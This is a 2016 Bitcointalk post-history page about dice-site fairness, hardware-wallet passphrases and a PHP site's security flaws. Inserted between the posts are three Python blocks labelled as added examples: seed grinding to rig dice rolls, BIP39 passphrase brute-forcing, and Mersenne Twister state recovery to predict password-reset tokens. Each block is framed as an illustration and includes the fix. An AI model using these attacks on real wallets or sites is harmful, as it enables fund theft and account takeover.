Bitcoin Forum
  Show Posts
321  Bitcoin / Hardware wallets / Re: [ESHOP launched] Trezor: Bitcoin hardware wallet on: August 24, 2016, 02:01:35 PM
I guess like that yeh, but I was still thinking on the "seed + keylogger risk" - it wouldn't help for that.
322  Economy / Gambling / Re: DiceSites.com - List of dice sites w/ statistics, graphs & verifiers on: August 24, 2016, 09:19:26 AM
I never looked at them and only had a quick look now:



Hi/Lo freebitco.in game
First of all, the house edge is 5%. There is nothing wrong with that, but most sites have a 0.5 - 1% house edge (SatoshiDice is the highest, with 1.95%.) Since they do give away free money and lottery entries, again I don't think there is anything wrong with it. But a "real dice player" probably should play somewhere else.

Provably fair
They use a "nonce", yet they change the server seed after each roll. So I am not sure why they would use that nonce. With the "per roll" provably fair implementation, it's important that the site regenerates a unique client seed in the browser after getting the new server seed hash after each bet. freebitco.in doesn't do this. This means IMO their provably fair implementation is "not really" provably fair.

Basically it allows them to serve a server seed based on bet patterns (if you always go high, they would generate a low result.) The counter argument is that they shouldn't do this, because if they do, you as a player can heavily cheat them too (bet 10x high, then a big low bet = easy profits.) Of course they could do it more subtly/smartly. But besides that, the least they can do is make a result that isn't 8888 (jackpot), to scam jackpot entries completely unnoticed.

I don't think they do this, but they should still fix this. Rollin had the same and fixed it: https://bitcointalk.org/index.php?topic=687571.msg12122724#msg12122724 You can see more details/fix there too.

Note, that you CAN still bet provably fair on their site. It just takes some time: 1) Click "provably fair" 2) write down "Hash" and "Nonce" 3) change the "Client seed" 4) make bet 5) verify bet (their link seems fine.) You will need to do this for EVERY bet.



Lottery
Lottery is not provably fair at all. So yeh, the "house player" can always win everything. If they want to implement a provably fair lottery, they should look into how PevPot used to do it.




TL;DR: personally I would gamble on other sites with proper provably fair implementations (preferably with real nonce-implementation.)
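The grinding problem described in the post, as an added example (not freebitco.in's or any site's own code). The roll derivation is an assumption: the Primedice-style HMAC-SHA512(server_seed, "client_seed:nonce") scheme with a 0..9999 result. grind_server_seed() is the abuse: a site that rotates the server seed every roll and already knows a stale client seed can search for a seed whose result it likes, publish that seed's hash as the "next" commitment, and every bet still verifies. play_round() is the player-side defence from the post: pick a fresh client seed after the hash is shown.

```python
import hashlib
import hmac
from typing import Callable, Optional

# Roll derivation ASSUMED for this example (Primedice-style, not freebitco.in's actual code):
# HMAC-SHA512(key=server_seed, msg="client_seed:nonce"), read 5 hex chars at a time,
# reject values >= 1_000_000 to avoid modulo bias, roll = value % 10000 (0..9999).

def roll_from_seeds(server_seed: str, client_seed: str, nonce: int) -> int:
    digest = hmac.new(server_seed.encode(), f"{client_seed}:{nonce}".encode(),
                      hashlib.sha512).hexdigest()
    for i in range(0, len(digest) - 4, 5):          # 25 windows of 5 hex chars
        value = int(digest[i:i + 5], 16)
        if value < 1_000_000:
            return value % 10000
    return 9999  # every window rejected; probability ~0.046**25, kept for completeness


def commit(server_seed: str) -> str:
    """The hash the site shows BEFORE the bet. It binds the site to one server seed."""
    return hashlib.sha256(server_seed.encode()).hexdigest()


def verify_roll(server_seed: str, commitment: str, client_seed: str,
                nonce: int, claimed_roll: int) -> bool:
    """What a player (or a third-party verifier page) checks after the seed is revealed."""
    if not hmac.compare_digest(commit(server_seed), commitment):
        return False                     # site revealed a different seed than it committed to
    return roll_from_seeds(server_seed, client_seed, nonce) == claimed_roll


def grind_server_seed(client_seed: str, nonce: int, wanted: Callable[[int], bool],
                      max_tries: int = 20_000) -> Optional[str]:
    """The abuse the post describes. A site that picks a NEW server seed for every roll and
    already knows the client seed (the player never changed it after seeing the hash) can
    search for a server seed whose roll satisfies `wanted` and publish THAT seed's hash as
    the 'next' commitment. verify_roll() still passes, so the player cannot tell."""
    for i in range(max_tries):
        candidate = hashlib.sha256(f"grind:{client_seed}:{nonce}:{i}".encode()).hexdigest()
        if wanted(roll_from_seeds(candidate, client_seed, nonce)):
            return candidate
    return None


def play_round(server_seed: str, commitment: str, client_seed: str, nonce: int) -> int:
    """Player-side flow from the post: get the hash, set a fresh client seed, bet, verify.
    A client seed chosen AFTER the hash is shown is unknown to the site when it commits,
    so there is nothing for the site to grind against."""
    roll = roll_from_seeds(server_seed, client_seed, nonce)
    if not verify_roll(server_seed, commitment, client_seed, nonce, roll):
        raise ValueError("commitment does not match revealed server seed")
    return roll


if __name__ == "__main__":
    import secrets
    stale_client_seed = "player-never-changed-this"
    # 1. Player always bets HIGH (wins on roll >= 5000). Cheating site grinds a LOW result.
    cheat_seed = grind_server_seed(stale_client_seed, 0, lambda r: r < 5000)
    shown_hash = commit(cheat_seed)
    roll = roll_from_seeds(cheat_seed, stale_client_seed, 0)
    print("ground roll:", roll, "verifies:",
          verify_roll(cheat_seed, shown_hash, stale_client_seed, 0, roll))
    # 2. Jackpot suppression: never produce 8888 while every bet still verifies.
    no_jackpot = grind_server_seed(stale_client_seed, 1, lambda r: r != 8888)
    print("jackpot-free roll:", roll_from_seeds(no_jackpot, stale_client_seed, 1))
    # 3. Defence: the player chooses a new random client seed after seeing the hash.
    fresh = secrets.token_hex(16)
    print("roll with fresh client seed:", play_round(cheat_seed, shown_hash, fresh, 0))
```

The verifier cannot distinguish a ground seed from an honest one; only the order of operations (commitment first, then a client seed the site has never seen, then the bet) removes the site's freedom. A real nonce implementation keeps one committed server seed across many bets, which makes per-roll grinding impossible as well.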
323  Economy / Gambling / Re: 🎲 DiceSites.com - List of dice sites w/ statistics, graphs & verifiers on: August 24, 2016, 08:27:08 AM
What's about Bitsler?
I see that site is growing every day and I like speed of bet in that site!
I think BitSler still doesn't show any wagered statistic, so I cannot add them to my site.
324  Bitcoin / Hardware wallets / Re: [ESHOP launched] Trezor: Bitcoin hardware wallet on: August 24, 2016, 07:02:15 AM
Yeh, even with a 10-digit PIN it would take a few minutes max, so I guess that's completely useless :P (again, the device adds a big, exponentially increasing delay upon every failed PIN, so it works fine for that.)
325  Bitcoin / Hardware wallets / Re: [ESHOP launched] Trezor: Bitcoin hardware wallet on: August 24, 2016, 05:22:13 AM
Yeh, seed + keylogger is probably the biggest risk. I think a PIN would be somewhat easy to brute-force if it were the 25th word (compared to a passphrase), but I'm too lazy to do the math. I can still see it could be an advantage for advanced users though (since a keylogger is less effective in that situation.)





Anyway, on a different subject, can anyone from SatoshiLabs tell me if an Android version of the TREZOR Password Manager is planned? I love the idea of using Trezor as a password manager and would actually encourage others to use it even if they don't have any bitcoins. But an Android version seems necessary for me personally. Even if it isn't as advanced as LastPass (easily fills in passwords in other apps etc), just a simple list + a way to get a password in an Android app would do for now.
326  Bitcoin / Hardware wallets / Re: [ESHOP launched] Trezor: Bitcoin hardware wallet on: August 24, 2016, 04:20:28 AM
Yes. Seed = private key. The PIN only protects against getting into the device (and does a good job at that, because every invalid PIN adds a serious delay.)

You should add a passphrase though, which functions as a 25th word. This should be pretty long (let's say 8+ characters), otherwise it could be easily brute-forced with the seed. However, if you forget your passphrase, the funds are gone.

Basically it's much more important to keep your backup seed safe than the device.
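The "PIN as 25th word is brute-forceable" math from the two posts above, as an added example (not SatoshiLabs' code). It implements the BIP39 seed derivation as specified (PBKDF2-HMAC-SHA512 over the mnemonic with salt "mnemonic" + passphrase, 2048 rounds), brute-forces a numeric passphrase once the seed words are known, and extrapolates the cost for longer passphrase spaces. Assumptions: the mnemonic is the standard "abandon ... about" test mnemonic, and seed_fingerprint() stands in for the attacker's real oracle (deriving addresses and checking the chain for a balance).

```python
import hashlib
import time
import unicodedata
from itertools import product
from typing import Dict, Optional

BIP39_ROUNDS = 2048          # fixed by BIP39
ASSUMED_MNEMONIC = ("abandon abandon abandon abandon abandon abandon "
                    "abandon abandon abandon abandon abandon about")  # test mnemonic, not a real wallet


def bip39_seed(mnemonic: str, passphrase: str = "") -> bytes:
    """BIP39 seed = PBKDF2-HMAC-SHA512(mnemonic, "mnemonic" + passphrase, 2048 rounds, 64 bytes).
    The passphrase is the hidden '25th word'; an empty passphrase gives the plain wallet."""
    key = unicodedata.normalize("NFKD", mnemonic).encode("utf-8")
    salt = ("mnemonic" + unicodedata.normalize("NFKD", passphrase)).encode("utf-8")
    return hashlib.pbkdf2_hmac("sha512", key, salt, BIP39_ROUNDS, dklen=64)


def seed_fingerprint(seed: bytes) -> str:
    """Stand-in (assumption) for the attacker's real oracle: deriving addresses from the
    seed and checking the chain for a balance."""
    return hashlib.sha256(seed).hexdigest()[:16]


def brute_force_numeric(mnemonic: str, target: str, digits: int) -> Optional[str]:
    """Attacker holds the backup seed words (e.g. via keylogger) and guesses a PIN-like
    passphrase. Each guess costs one PBKDF2 run and nothing else: no device, no delay."""
    for combo in product("0123456789", repeat=digits):
        guess = "".join(combo)
        if seed_fingerprint(bip39_seed(mnemonic, guess)) == target:
            return guess
    return None


def brute_force_cost(mnemonic: str, samples: int = 50) -> Dict[str, float]:
    """Measure single-core derivation time here and extrapolate worst-case seconds for
    several passphrase spaces. GPU crackers run PBKDF2-SHA512 orders of magnitude faster."""
    start = time.perf_counter()
    for i in range(samples):
        bip39_seed(mnemonic, str(i))
    per_guess = (time.perf_counter() - start) / samples
    spaces = {
        "4-digit PIN": 10 ** 4,
        "6-digit PIN": 10 ** 6,
        "8 lowercase letters": 26 ** 8,
        "8 mixed-case alphanumerics": 62 ** 8,
        "12 mixed-case alphanumerics": 62 ** 12,
    }
    return {name: size * per_guess for name, size in spaces.items()}


if __name__ == "__main__":
    victim_passphrase = "0731"                     # weak: a PIN used as the 25th word
    target = seed_fingerprint(bip39_seed(ASSUMED_MNEMONIC, victim_passphrase))
    print("recovered passphrase:", brute_force_numeric(ASSUMED_MNEMONIC, target, 4))
    for name, secs in brute_force_cost(ASSUMED_MNEMONIC).items():
        print(f"{name:28s} {secs / 86400 / 365:.3g} years on one core (worst case)")
```

The point of the example is the asymmetry the posts describe: the device's PIN is protected by the exponential retry delay, but a passphrase is only protected by PBKDF2's 2048 rounds, which an attacker with the seed words runs offline as fast as their hardware allows. bip39_seed() can be checked against the published Trezor BIP39 test vectors.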
327  Economy / Services / Re: EmpireCoin: Bug bounty program on: August 12, 2016, 03:45:03 PM

session_id() should not be at risk of SQL injection since it is server side.  I have just escaped it anyways though.


The cookie value supports all the alphanumerics +
Code:
!#$%&'()*+-./:<=>?@[]^_`{|}~
Putting a ' in the PHPSESSID value can be used for SQL injection.

 
This is incorrect.

From the PHP documentation:
Quote
For example, the file session handler only allows characters in the range a-z A-Z 0-9 , (comma) and - (minus)!

You can also very easily test this yourself. Just echo both session_id() and $_COOKIE["PHPSESSID"]. You can see that the cookie value will be echoed even with ' or " in it, however the session_id will be empty. But if you change the cookie to only a-z A-Z 0-9 , -, it will also be returned by the session_id function.
328  Economy / Gambling / Re: 🎲 DiceSites.com - List of dice sites w/ statistics, graphs & verifiers on: August 12, 2016, 12:04:16 PM
Probably :)
329  Economy / Services / Re: EmpireCoin: Bug bounty program on: August 12, 2016, 06:21:29 AM
TBH your whole code looks like a lot of security risks. I thought about making a proper list of vulnerabilities, but this would require a lot of time from me (since your site does look complex) and the bounties look a bit "uncertain". So I am not sure if I want to put like a few days of time into it TBH.



Just in general you REALLY should adjust this:

* NEVER ever use the "quote()" shit for protection against SQL injection. Use prepared statements (look up PDO->prepare()) instead.
* Use CSRF protection probably just ALWAYS whenever there is user input. I am pretty sure I can steal the escrow coins by sending the escrow a URL that loads an iframe/post-form/etc to send the coins to me. This requires user interaction (the escrow has to open a URL), but can be pretty easy/doable.
* IMO you shouldn't strip_tags before putting it in the DB. Just always sanitize the output to the user. A template system can help with this, some will HTML encode every variable by default.
* Best to make most scripts NOT public for visitors to access. Basically you should only have .htaccess + bootstrapper (index.php) in your public_html together with CSS/JS/images. All PHP should be outside of it and just loaded by index. In your situation, you could at least hide the cron/classes/includes/libs/scripts. For example I can get your RPC password here: http://empirecoin.org/scripts/getinfo.php That is probably some test file which you forgot to delete (and I assume bitcoind is not running at the moment), but it could be a serious problem.
* Just in general your code would be much easier to read (= easier to see bugs) if it's divided into an MVC structure.
* Functions like rand() and mt_rand() are not cryptographically secure. It is possible to hack accounts on your site by using the "reset password" function and cracking mt_rand. Search for random_bytes() - I believe that is cryptographically secure in PHP lately.

All of those things, are generally taken care of by a PHP framework. That is why using a PHP framework is pretty great. I really like Laravel lately. But converting your site to a PHP framework might take serious time.



On the positive side: it seems to have a lot of features and I can always appreciate open-source work.



Another SQL Injection is detected in "get_session.php" line 15.
$session_key is not escaped.
I am pretty sure session_id() verifies any session ID from cookie etc? I don't think you can get values with " with that. OP should still use prepared statements though.
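The mt_rand() point from the list above, shown as an added example (not EmpireCoin's code) in Python, because Python's random module is the same MT19937 generator that PHP's mt_rand() is built on. WeakResetTokens is a hypothetical password-reset token generator that draws 128-bit tokens from the Mersenne Twister; an attacker who requests 156 resets for their own account gets 624 consecutive 32-bit outputs, untempers them, and predicts the next victim's token exactly. MTPredictor works from the output history alone, so it does not matter where in the generator's 624-word block the observed run starts. Caveat: PHP's mt_rand() returns each output shifted right by one bit, and PHP before 7.1 used a non-standard twist, so a real PHP attack needs the PHP-specific variant of the same idea. secure_token() is the fix the post recommends (random_bytes() in PHP, secrets here).

```python
import random
import secrets
from typing import List, Tuple

# MT19937 constants (the generator behind PHP's mt_rand() and Python's random module)
N, M = 624, 397
MATRIX_A, UPPER, LOWER, MASK32 = 0x9908B0DF, 0x80000000, 0x7FFFFFFF, 0xFFFFFFFF


def temper(y: int) -> int:
    """Output tempering MT19937 applies to every state word before returning it."""
    y ^= y >> 11
    y ^= (y << 7) & 0x9D2C5680
    y ^= (y << 15) & 0xEFC60000
    y ^= y >> 18
    return y & MASK32


def untemper(y: int) -> int:
    """Inverts temper(). Each step XORs a word with a shifted copy of itself, so reapplying
    the step iteratively recovers the bits from the unshifted side outward."""
    def undo_right(v: int, s: int) -> int:
        x = v
        for _ in range(32 // s + 1):
            x = v ^ (x >> s)
        return x

    def undo_left(v: int, s: int, mask: int) -> int:
        x = v
        for _ in range(32 // s + 1):
            x = v ^ ((x << s) & mask)
        return x & MASK32

    y = undo_right(y, 18)
    y = undo_left(y, 15, 0xEFC60000)
    y = undo_left(y, 7, 0x9D2C5680)
    return undo_right(y, 11)


class MTPredictor:
    """Feed 624 consecutive 32-bit outputs; predicts every later output at any alignment,
    because MT19937 is a linear recurrence over its own (untempered) output history:
    u[i+624] = u[i+397] ^ twist(u[i], u[i+1])."""
    def __init__(self, observed: List[int]):
        if len(observed) < N:
            raise ValueError("need at least 624 consecutive outputs")
        self.u = [untemper(o) for o in observed[-N:]]

    def next_output(self) -> int:
        x = (self.u[-N] & UPPER) | (self.u[-N + 1] & LOWER)
        xa = x >> 1
        if x & 1:
            xa ^= MATRIX_A
        new = self.u[-N + M] ^ xa
        self.u.append(new)
        return temper(new)


class WeakResetTokens:
    """Hypothetical reset-token generator built on a Mersenne Twister, like a PHP site
    using mt_rand(). random.Random is MT19937, so it reproduces exactly that mistake."""
    WORDS = 4                            # 4 x 32 bits = 128-bit token: looks strong, is not

    def __init__(self, seed: int):
        self.rng = random.Random(seed)

    def token(self) -> str:
        return "".join(f"{self.rng.getrandbits(32):08x}" for _ in range(self.WORDS))


def outputs_from_tokens(tokens: List[str]) -> List[int]:
    """The attacker requests many resets for an account they control and parses the tokens."""
    return [int(t[i:i + 8], 16) for t in tokens for i in range(0, len(t), 8)]


def predict_token(p: MTPredictor) -> str:
    return "".join(f"{p.next_output():08x}" for _ in range(WeakResetTokens.WORDS))


def demo_attack(seed: int, warmup_tokens: int = 0) -> Tuple[str, str]:
    """Returns (predicted, actual) for the NEXT reset token after the attacker has observed
    156 tokens (156 * 4 = 624 outputs). warmup_tokens simulates other users' earlier
    requests, so the observed run need not start at a generator block boundary."""
    site = WeakResetTokens(seed)
    for _ in range(warmup_tokens):
        site.token()
    seen = [site.token() for _ in range(N // WeakResetTokens.WORDS)]
    predictor = MTPredictor(outputs_from_tokens(seen))
    return predict_token(predictor), site.token()   # site.token() is the victim's real token


def secure_token() -> str:
    """The fix: an OS-backed CSPRNG (PHP: random_bytes(); Python: secrets)."""
    return secrets.token_hex(16)


if __name__ == "__main__":
    predicted, actual = demo_attack(seed=20160812, warmup_tokens=37)
    print("predicted:", predicted, "actual:", actual, "match:", predicted == actual)
```

Token length is irrelevant here: 128 bits drawn from a predictable generator carry no more entropy than the attacker's 624 observed outputs. Swapping the generator for the OS CSPRNG is the whole fix; rate-limiting reset requests only slows the collection step.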
330  Economy / Gambling / Re: 🎲 DiceSites.com - List of dice sites w/ statistics, graphs & verifiers on: August 09, 2016, 04:15:42 AM
Could you list some sites that didn't make the cut on your site, but are on the fringe? For example, a site like Bitvest. I'm looking for some more investment options outside of the sites you have already listed.
On new version I will probably add (not all invest-based btw): crypto-games.net, bitinvest, bustabit, luckybit, pocketdice (if they finally fix their PF method) and maybe others. Most of these (and some currently listed) will be hidden by default with some filters. So new visitors see only the "most popular dice sites" while "advanced users" can see more sites.
when are you planning to release new version?
Like a year ago, lol. No, but next month should be realistic :)
331  Economy / Gambling / Re: 🎲 DiceSites.com - List of dice sites w/ statistics, graphs & verifiers on: August 08, 2016, 03:36:44 AM
Can you tell me more about the FJ faking false stat? I was around for quite some time but i didnt hear about this before.
The FortuneJack faking stats "discussion" started here: "Are the wagered stats of 14+ million BTC on the homepage correct?", they denied having wrong stats a couple of times, so I gave a bit more arguments in this post. Finally they acknowledged it was wrong and claimed it was because of some exchange rate bug and offered me a bug bounty in PM (probably to keep me quiet - I refused.) I gave some more arguments on why the wrong stats couldn't be caused by an exchange rate bug. They basically just ignored it from there. A few days later they did lower their stats by 28 times but still basically ignored my arguments.

I know FortuneJack however does have some real players who deposit/withdraw without any problem, so I don't make a huge deal out of it. But it is obviously pretty sketchy and I won't ever list them on my site because of it (impossible for me to trust their stats after that.)

As i am a fan of your site, is it possible to add more gamble site to it? I see that there are other gambling sites but it is not included in your list.
Thanks. I do plan to add several other sites when I finished the new version of my site. Unfortunately that is taking pretty long lol, but it will come eventually.
332  Economy / Gambling / Re: 🎲 DiceSites.com - List of dice sites w/ statistics, graphs & verifiers on: August 08, 2016, 02:21:25 AM
We are using your site as 3rd party verifier to our rolls. At the moment we are linking to Primedice since we use exactly the same generation process, but it would be cool if you could create a page (even if not visible from the homepage or any other section) for this purpose.
@NLNico any comment regarding this?
No, I won't support your site in any way. Problem is that you are obviously faking stats. My site is all about statistics and doesn't make any stupid subjective ratings, but rather lists sites based on wagered stats as "popularity indicator". When sites like FortuneJack and now you, are faking stats, I see that as serious sketchy behavior. I won't list sites that do shit like that.

You are free to have your own opinion, however you cannot make false accusations without any valid fundament or even a justification of that opinion.
True.

To be honest anyone who ever been on a dice site can just go to https://www.betbtc.co/casino/dice and look at the bet list themselves. All those 100% random amounts and chances.. LOL! That should really show enough for anyone who knows the basics of dice (people betting default 2x option, strategies with same payout, strategies with increasing amounts - martingale, etc.)

333  Other / Meta / Re: Tipsters are cancer to the Gambling sections (exceptions apply). on: August 06, 2016, 09:51:03 AM
Yes. There should be a "Gambling discussions" subforum. Both the "Tipsters" and the "Discussion" threads are very low quality (mostly signature and ref spam.) There are "discussions" with thousands of replies on the question "is gambling profitable"... it's just insane really.

I actually made a user script that allows you to "Ignore threads" just because of the insane spam in the Gambling forum (script here: https://bitcointalk.org/index.php?topic=1451483.0) The subforum idea has come up many times, see also this topic from 1 year ago with more arguments: https://bitcointalk.org/index.php?topic=1162790.0;all Right now my Gambling forum looks like this (just see how many are "discussions/tipster" topics):



If the Gambling forum would be only topics with sites (who put effort into making a good website etc), I think the quality would be much better. In the end bitcointalk is still the center of the bitcoin gambling community, but the Gambling forum itself is very disappointing. A simple "Gambling discussion" forum would help. The rule could be simple, no paid domain with real website = in subforum.
334  Economy / Games and rounds / Re: 1000 BTC Giveaway - what might be happening. on: August 06, 2016, 06:19:59 AM
Obviously those new accounts 6102rekcahxfb, hackrekcahxfb, etc. are scammers as well. Can't believe that the troll-hacker actually got 0.46 from it... why would anyone send anything to that address :s Even the original troll said on Slack/Reddit on his confirmed other accounts that he was hacked..

Anyway, leaving this reply so I can use it as reference for new negative trust for those new accounts.


Are the hacked funds in '1BfxSuxa-------------- will share soon.' address?
No. That signed message is from the original "bfxhacker" and therefore useless. The Blockchain.info screenshot is either just edited HTML or maybe even just the "watch address" function. Totally useless.

That new address will be empty. And he will say he is the real "bfxhacker" (which isn't true) and you need to send funds to that new address of his.

Obvious scam is obvious.
335  Economy / Securities / Re: BetKing.io Investor thread - 4939 Bitcoin profit, 4208 Bitcoin invested on: August 06, 2016, 05:04:24 AM
Some losses for investors tonight. Player "norightturnplease" won BTC210: https://i.imgur.com/iTU40ay.png



I invested 1 BTC in Betking.io in the last months and waited for 2 weeks, I didn't get a profit.

Could you please share your average monthly profit for investors?

If it is fine now, I can invest with my fund.
Players can win (big) too, so there is no guaranteed winnings. In the long-term you should get a profit of course though. You can look at the graphs here: https://dicesites.com/betking to see how the total profit progresses and what your expected profit is based on wagered amounts.
336  Economy / Gambling / Re: 10 Bitcoin Jackpot on Social Dice @ BetKing.io on: August 06, 2016, 05:00:39 AM
Player "norightturnplease": 40 bets, BTC640 wagered, BTC210 profit. Easy game :)

337  Economy / Gambling / Re: 🎲 DiceSites.com - List of dice sites w/ statistics, graphs & verifiers on: August 05, 2016, 03:56:14 PM
We are using your site as 3rd party verifier to our rolls. At the moment we are linking to Primedice since we use exactly the same generation process, but it would be cool if you could create a page (even if not visible from the homepage or any other section) for this purpose.
@NLNico any comment regarding this?
No, I won't support your site in any way. Problem is that you are obviously faking stats. My site is all about statistics and doesn't make any stupid subjective ratings, but rather lists sites based on wagered stats as "popularity indicator". When sites like FortuneJack and now you, are faking stats, I see that as serious sketchy behavior. I won't list sites that do shit like that.



Anyone knows what happened to dicenow.com ?!?
Not sure. In early June someone posted that most BTC of Dicenow are from a hack. The owner didn't reply, but did change the OP 5 days later saying "Dicenow.com is shutting down at the end of June. Please divest and withdraw all coins ASAP.". So either way, looks like they are gone.

Generally when a site/owner becomes inactive it is a red flag. Ice Dice, Win88, Dicenow, Diggit (was offline for months, no reply from owner), Coinichiwa (owner gone for 6 months now), etc. Always risky to leave coins on a site with inactive owner.



Can you explain more clearly, please?
What happens if all people, or many, many people, win on a dice site?
More and more people play and the dice site will never die. What do you mean by what you say?

The maximum profit a player can win per bet, changes after each bet. This should be around 0.5-1% of the bankroll (or the "virtual bankroll" if margin-funding is allowed.) This way the player should never be able to win "all" the money based on the Kelly criterion theory.
338  Economy / Games and rounds / Re: 1000 BTC Giveaway - what might be happening. on: August 04, 2016, 05:41:46 PM
Quote
Is the hacker.. hacked?

1. Password change.
2. His English skills seem to be terrible now.
3. Asking 0.001 entry money.

Do not trust. At minimum he should sign a message with previous address. And still I would question his intentions

Left negative trust for now.

Very strange plot twist.

TBH if he signs messages from 1BfxSux... addy again, I might remove negative trust. In the end if people want to join this very risky "lottery", that is their own choice. But those 3 "changes" do seem really strange indeed.





edit: TBH I really think he used some throwaway password and got hacked.

Quote
Deductive reasoning suggests that you're more likely to hear it from bitfinex than the attacker because the attacker doesn't want to tell bfx anything it doesn't know, or help them expedite their investigation. While bfx wouldn't want to share their hand to the attacker, they face brand repercussions the less information they disclose.
Yesterday in Slack he was saying things like above.. which seems like pretty good English to me. But now he talks like this:
Random select 1 address from unique addresses list.
Really? Nah.


Also on Slack:
Quote
I have not provided any evidence I am the bitfinex hacker. Please do not trust random people. Even if they throw around a thousand BTC.
There are scammers already and there will be more. I will NEVER ask you for money.
339  Economy / Games and rounds / Re: 1000 BTC Giveaway - what might be happening. on: August 04, 2016, 03:10:28 AM
His e-mail on slack is: ethereumdefense@yandex.com

So the plot thickens.. Is this hacker an Ethereum Maximalist trying to destroy Bitcoin?

Let me guess, next thing the Ethereum Maximalists are going to hard fork Bitcoin with all hacks/thieves addresses blacklisted and pump all their ETH into BBTC (Bailout-Bitcoin) to pump the price and hurt the Bitcoin price?! Damn Ethereum Maximalists.
340  Economy / Gambling / Re: Primedice 4 ! | Most Popular & Trusted Bitcoin Game | Huge Community | Free BTC on: July 15, 2016, 07:44:01 AM
Why is the site still pingable?
Like most BTC sites they use Cloudflare (which is between you and the actual PD server.) So you are pinging Cloudflare, not their server.